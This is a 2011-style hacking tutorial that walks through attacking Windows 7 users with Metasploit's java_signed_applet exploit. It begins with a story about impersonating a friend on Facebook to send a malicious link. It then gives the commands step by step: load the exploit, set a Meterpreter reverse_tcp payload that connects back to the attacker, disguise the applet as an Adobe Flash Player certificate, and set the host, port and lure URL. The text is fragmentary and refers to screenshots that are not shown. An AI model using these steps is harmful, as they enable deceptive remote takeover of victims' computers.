Type : Tutorial
Level : Easy, Medium, Advanced
Success rate : Excellent
Platform : Win 7 SP 1(all windows), I've also tried in Linux Debian 6 using Iceweasel, but no luck..maybe someone has try it?
Today in this tutorial we will doing some trick using Social Engineering style to attack victim. Before we start, let me tell you a little story why I'm writing this tutorial :-).
Yesterday 2011/7/29 my friend KENT came to my home and then told me that his computer has been hacked because of link sent by his friend CLARK via facebook. CLARK didn't know anything, because he never use his facebook and someone has impersonate him and starting to send malicious URL via facebook. KENT receive inbox message from fake CLARK in his facebook like this "hey I've uploaded the video of yours here http://attacker.com/videoplaylist". KENT think that CLARK was his friend and KENT also curious want to see what kind of video his friend already upload.
Interesting isn't it?someone can act as other person and started to sending malicious URL. (you can view here how to hack facebook using man in the middle attack). Now in this tutorial we will do almost the same thing Hacking Windows 7 SP 1 Using Java Signed Applet Social Engineering Code Execution. Let's start
2. Operating System(I'm recommend using Linux OS or Backtrack 5)
1. Open your msfconsole and find java_signed_applet exploit with command search java_signed_applet. If you can't find it, try to update your Metasploit Framework to newer version with msfupdate command. If the exploit was available, let's continue with picture below.
use exploit/multi/browser/java_signed_applet ---> load the java_signed_applet exploit set payload windows/meterpreter/reverse_tcp ---> set the reverse_tcp meterpreter to connect back to our machine
2. The next step, we need to add some required switches to make an attack successful. The picture below is my switches configuration, but if you want to view available switches, you can type show options.
set appletname Adobe_Inc ---> To inform the victim about the name of our java applet and make sure your victim not suspicious with link you give set certcn Adobe Flash Player ---> On older versions the dialog will display the value of CERTCN in the "Publisher" line. Newer JVMs display "UNKNOWN" when the signature is not trusted (i.e., it's not signed by a trusted CA). set srvhost 192.168.8.92 ---> host that served the exploit set srvport 80 ---> I'm choose 80, because it's really great for computer social engineering especially social engineering via website set uripath videoplaylist ---> the URL format to send to victim (http://192.168.8.92/videoplaylist) set lhost 192.168.8.92 ---> connect back address when successfully perform attack set lport 443 ---> port used to connect back to our machine